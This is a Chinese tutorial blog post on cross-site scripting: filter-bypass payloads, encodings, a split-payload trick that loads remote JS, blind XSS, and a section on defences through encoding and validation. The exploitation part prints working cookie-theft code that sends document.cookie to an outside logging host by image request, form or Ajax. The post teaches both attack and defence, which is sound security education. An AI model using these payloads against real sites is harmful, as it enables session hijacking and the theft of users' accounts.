跨站脚本攻击(四)(跨站脚本攻击有哪些) - 技术文章 - 南山导航
跨站脚本攻击(四)(跨站脚本攻击有哪些)
nanshan 2025-03-19 14:58 13 浏览 0 评论
04
XSS漏洞挖掘技巧
4.1
常见的绕过姿势
实际应用中web程序往往会通过一些过滤规则来阻止带有恶意代码的用户输入被显示,但由于HTML语言的松散性和各种标签的不同优先级,使得我们绕过过滤规则成为了可能。
4.1.1 利用大小写绕过
HTML标签名和属性名是不区分大小写,我们可以全使用大写,或者混合使用,如下的几段代码都是可以被正确解析的:
<ScRipt>alert(1)</SCRIpt>
4.1.2 使用未知标签
aaaa
4.1.3 不使用空格和引号
<img/src='1'/onerror=alert(1)>
<body/onload=alert(1)>
4.1.4 不闭合标签
<body/onload=alert(1)>
4.1.5 使用回车、Tab等符号截断javascript
而浏览器中解析器中词法分析器会跳过空白跟换行之类的无效字符
使用回车截断javascript
使用tab截断javascript
4.1.6 利用过滤器规则
<Sc<script>Ript>alert(1)</sCRIp</script>t>
4.2
HTML编码
HTML标签中的某些属性值可以使用ASCII方式进行编码:
如把尖括号编码[ < -----> html十进制: < html十六进制:<
aaaa
4.3
Javascript编码
js提供了 3 种字符编码的策略:
· jsunicode编码,例如“e”编码为“\u0065”
· js十六进制,例如“e”编码为“\x65”
· js八进制,例如“e”编码为“\145”
4.4
跨站拆分法
安全研究员“剑心”发现某个网站存在XSS漏洞,漏洞出现在评论的联系方式处,但是,这处只能写入30个字符长度,必须的<script></script>就占用了17个字符,剩下的只有13个字符可以支配,如此一来,这个XSS只能用来弹出一个警告框。
幸运的是,网站评论处可以重复留言,也就是说可以提交多个脚本标记,于是‘剑心’就巧妙的构造出以下XSS利用代码。
<script>z=’document.write’</script>
<script>z=Z+’write(” ‘</script>
<script>z=z+’<script>’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript’</script>
<script>eval(z)</script>
上述代码的作用是引入一个字符串变量Z,并且将下面的代码拆分开来。
document.write(' src=//www.shell.net/1.js>')
然后分几次将其嵌入到变量Z中,最后通过 eval(z) 巧妙地执行代码。
05
XSS漏洞利用
点击添加图片描述(最多60个字)
5.1
窃取Cookie
点击添加图片描述(最多60个字)
5.1.1 读取Cookie
直接在浏览器地址栏执行javascript:alert(document.cookie),就可以看到当前的cookie。
点击添加图片描述(最多60个字)
5.1.2 发送Cookie
5.1.2.1 利用img标签(最常用)
只需将alert(1)替换为以下Payload:
var img=document.createElement("img"); //创建一个img元素节点
img.src="
http://www.nsf-test-xss.com/log?cookie="+escape(document.cookie); //设置src属性
document.body.appendChild(img); //添加到body节点下
5.1.2.2 使用form表单
<script>
var a = escape(document.cookie)
document.getElementById("i").value=a; //读取cookie并填入value
document.getElementById("x").submit(); //提交表单
</script>
可以看到,页面跳转到了攻击者的网站,这对攻击者来说显然是很不友好的。
点击添加图片描述(最多60个字)
5.1.2.3 使用Ajax发送
Ajax的全称是Asynchronous JavaScript and XML(异步的 JavaScript 和 XML)。Ajax并不是一门新的语言,使用现有的JS语法。简单地讲,Ajax是高配版的JS form。
由于Ajax可以在不重载整个页面的情况下,对网页的某些部分进行更新。并且Ajax可以在后台传输数据,而对前台没有影响。
XMLHttpRequest是一个浏览器接口,使得Javascript可以进行HTTP(S)通信。
IE
Chrome
同域请求
ActiveXObject("Microsoft.XMLHTTP") ActiveXObject("MSXML2.XMLHTTP")
XMLHttpRequest
跨域请求
XDomainRequest
XMLHttpRequest
之前的web页面都是传递整个页面结果,导致浪费了大量的网络宽带。使用了Ajax技术之后,客户端只向服务器传输更新过的内容,借助于客户端的javascript处理服务器的响应。
点击添加图片描述(最多60个字)
事先把XMLHttpTrquest对象写在一个子程序汇总。数据在服务器URL后面,用“?”字符分割,问号后面的数据会被解析成键值。发送数据的MIME类型通常是
application/x-www-for-urlencode 使用XMLHttpRequest的优势,就是可以从服务器读取不同形式的文本数据,包括XML。
5.1.2.4 限制输入长度
对比上面三种传递方式,发现第二种的代码长度是最长的,这也是才构造了一个form表单,可想而知,若要构造出一个完整的页面进行钓鱼攻击,代码长度势必是不会短的。不仅仅是钓鱼,利用XSS获取用户页面信息、Web蠕虫等特殊情况下代码长度肯定也是很长的。然而实际环境下,很多情况服务端都会限制客户端的输入字符长度。
点击添加图片描述(最多60个字)
5.1.2.5 调用外部脚本
1. 静态创建
<script src="JS地址"></script>
2. 动态创建
<script>
var s=document.createElement("script");
s.src="JS地址";
(document.body||document.documentElement).appendChild(s);
</script>
3. 图片方式调用外部JS

4.借用Jquery
$
我们经常使用向 $ 内传入一个字符串的方式来选择或生成 DOM 元素,但如果这个字符串是来自用户输入的话,那么这种方式就是有风险的。
先看一个 DEMO:
http://jsbin.com/duwuzonife/1/edit?html,js,output
$("
");
当用户输入的字符串是像这样的时,虽然这个 元素不会马上被插入到网页的 DOM 中,但这个 DOM 元素已经被创建了,并且暂存在内存里。而对于 元素,只要设置了它的 src 属性,浏览器就会马上请求 src 属性所指向的资源。我们也可以利用这个特性做图片的预加载。在上面的示例代码中,创建元素的同时,也设置了它的属性,包括 src 属性和 onerror 事件监听器,所以浏览器会马上请求图片资源,显然请求不到,随机触发 onerror 的回调函数,也就执行了 JavaScript 代码。
推荐阅读 $ 的官方文档:
http://api.jquery.com/jQuery/
类似的其他方法
after()
.append()
.appendTo()
.before()
.html()
.insertAfter()
.insertBefore()
.prepend()
.prependTo()
.replaceAll()
.replaceWith()
.unwrap()
.wrap()
.wrapAll()
.wrapInner()
.prepend()
以上这些方法不仅创建 DOM 元素,并且会马上插入到页面的 DOM 树中。如果使用 `` 标签插入了内联 JS 会立即执行。
不安全的输入来源
document.URL *
document.location.pathname *
document.location.href *
document.location.search *
document.location.hash
document.referrer *
window.name
document.cookie
document 的大多数属性都可以通过全局的 window 对象访问到。加 * 的属性返回的时编码 (urlencode) 后的字符串,需要解码才可能造成威胁。
点击添加图片描述(最多60个字)
05
盲打
“明打”: 知道输出点情况,可以慢慢调整攻击代码。
“盲打”: 不清楚输出点情况,只能猜想。
盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫盲打。
”xss盲打“是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定好的“真实攻击功能”。
通俗讲就是见到输入框就输入提前准备的xss代码,通常是使用script标签引入远程的js代码,当有后台人员审核提交数据时候,点击了提交的数据,触发获取到有价值信息。
点击添加图片描述(最多60个字)
常见的输出场景
1. [输出点]
2.
3.
考虑多种情况,所以构造出XSS语句:
“'>
06
XSS漏洞防御
输入校验:长度限制、值类型是否正确、是否包含特殊字符。其实校验是对数据无害的,满足就放行,不满足就阻止,这样也能保证数据的原生态。
输出编码:根据输出的位置进行相应的编码,如HTMl编码、Javascript编码、URL编码。
具体对策
6.1
进入HTML标签之间时
比如,在之间,HTML编码转换规则如下:
& --> &
< --> <
\> --> >
“ --> "
' --> '
/ --> /
6.2
进入HTML普通属性值时
普通属性如 value、width、height等
...
无引号包围属性值
...
有引号包围属性值
如果属性值被单引号或是双引号包围了,那只要对单双引号进行HTML编码即可,若 没有引号包围,情况就复杂多了,还得考虑各种浏览器得解析方式,所以强烈建议属性值用引号引起来。
6.3
进入HTML特殊属性值时
特殊属性如 href、src、action等
进入这种属性时候需要特别注意,一不小心就可能漏掉某条规则,所以这种情况下建议使用白名单的方式来限制属性的行为。
6.4
进入CSS中时
CSS非常松散,如果是过滤具体摸个CSS属性值,比如width的值时,尽量避免出现“、’、;、}、{、(、)等特殊字符
如果允许用户完整地自定义CSS,则需要过滤掉javascript伪协议、expression、@import等,需要注意的时expression在IE6下对全角字符的处理xua
6.5
进入Javascript时
这种情况最为复杂,最好根据现场环境确定过滤对策,需要注意JS的三种编码方式。
现实环境
现实环境中,很多情况下我们并不需要像上面说的那样一个一个字符去过滤,因为大部分语言框架都已经有相对成熟的XSS防御方案了,只需要调用即可,而且也不推荐自行去实现过滤函数。
我们只要清楚地知道用户输入到最终的输出整个过程中的每个环节,保证在最终输出的时候是安全的,那么就可以防御住99%以上的XSS攻击了
· 作为开发人员,要有一定的安全意识,当编写一段代码的时候,要站在攻方的角度,来思考程序的安全性。
· 作为安全人员,要站在开发人员的角度来思考,推测开发人员的逻辑,寻找缺陷,并加以利用。
转自杭州美创科技有限公司公众号,如需二次转载,请联系marketing@mchz.com.cn
相关推荐
- 0722-6.2.0-如何在RedHat7.2使用rpm安装CDH(无CM)
-
文档编写目的在前面的文档中,介绍了在有CM和无CM两种情况下使用rpm方式安装CDH5.10.0,本文档将介绍如何在无CM的情况下使用rpm方式安装CDH6.2.0,与之前安装C5进行对比。环境介绍:...
- ARM64 平台基于 openEuler + iSula 环境部署 Kubernetes
-
为什么要在arm64平台上部署Kubernetes,而且还是鲲鹏920的架构。说来话长。。。此处省略5000字。介绍下系统信息;o架构:鲲鹏920(Kunpeng920)oOS:ope...
- 生产环境starrocks 3.1存算一体集群部署
-
集群规划FE:节点主要负责元数据管理、客户端连接管理、查询计划和查询调度。>3节点。BE:节点负责数据存储和SQL执行。>3节点。CN:无存储功能能的BE。环境准备CPU检查JDK...
- 在CentOS上添加swap虚拟内存并设置优先级
-
现如今很多云服务器都会自己配置好虚拟内存,当然也有很多没有配置虚拟内存的,虚拟内存可以让我们的低配服务器使用更多的内存,可以减少很多硬件成本,比如我们运行很多服务的时候,内存常常会满,当配置了虚拟内存...
- 国产深度(deepin)操作系统优化指南
-
1.升级内核随着deepin版本的更新,会自动升级系统内核,但是我们依旧可以通过命令行手动升级内核,以获取更好的性能和更多的硬件支持。具体操作:-添加PPAs使用以下命令添加PPAs:```...
- postgresql-15.4 多节点主从(读写分离)
-
1、下载软件[root@TX-CN-PostgreSQL01-252software]#wgethttps://ftp.postgresql.org/pub/source/v15.4/postg...
- Docker 容器 Java 服务内存与 GC 优化实施方案
-
一、设置Docker容器内存限制(生产环境建议)1.查看宿主机可用内存bashfree-h#示例输出(假设宿主机剩余16GB可用内存)#Mem:64G...
- 虚拟内存设置、解决linux内存不够问题
-
虚拟内存设置(解决linux内存不够情况)背景介绍 Memory指机器物理内存,读写速度低于CPU一个量级,但是高于磁盘不止一个量级。所以,程序和数据如果在内存的话,会有非常快的读写速度。但是,内存...
- Elasticsearch性能调优(5):服务器配置选择
-
在选择elasticsearch服务器时,要尽可能地选择与当前业务量相匹配的服务器。如果服务器配置太低,则意味着需要更多的节点来满足需求,一个集群的节点太多时会增加集群管理的成本。如果服务器配置太高,...
- Es如何落地
-
一、配置准备节点类型CPU内存硬盘网络机器数操作系统data节点16C64G2000G本地SSD所有es同一可用区3(ecs)Centos7master节点2C8G200G云SSD所有es同一可用区...
- 针对Linux内存管理知识学习总结
-
现在的服务器大部分都是运行在Linux上面的,所以,作为一个程序员有必要简单地了解一下系统是如何运行的。对于内存部分需要知道:地址映射内存管理的方式缺页异常先来看一些基本的知识,在进程看来,内存分为内...
- MySQL进阶之性能优化
-
概述MySQL的性能优化,包括了服务器硬件优化、操作系统的优化、MySQL数据库配置优化、数据库表设计的优化、SQL语句优化等5个方面的优化。在进行优化之前,需要先掌握性能分析的思路和方法,找出问题,...
- Linux Cgroups(Control Groups)原理
-
LinuxCgroups(ControlGroups)是内核提供的资源分配、限制和监控机制,通过层级化进程分组实现资源的精细化控制。以下从核心原理、操作示例和版本演进三方面详细分析:一、核心原理与...
- linux 常用性能优化参数及理解
-
1.优化内核相关参数配置文件/etc/sysctl.conf配置方法直接将参数添加进文件每条一行.sysctl-a可以查看默认配置sysctl-p执行并检测是否有错误例如设置错了参数:[roo...
- 如何在 Linux 中使用 Sysctl 命令?
-
sysctl是一个用于配置和查询Linux内核参数的命令行工具。它通过与/proc/sys虚拟文件系统交互,允许用户在运行时动态修改内核参数。这些参数控制着系统的各种行为,包括网络设置、文件...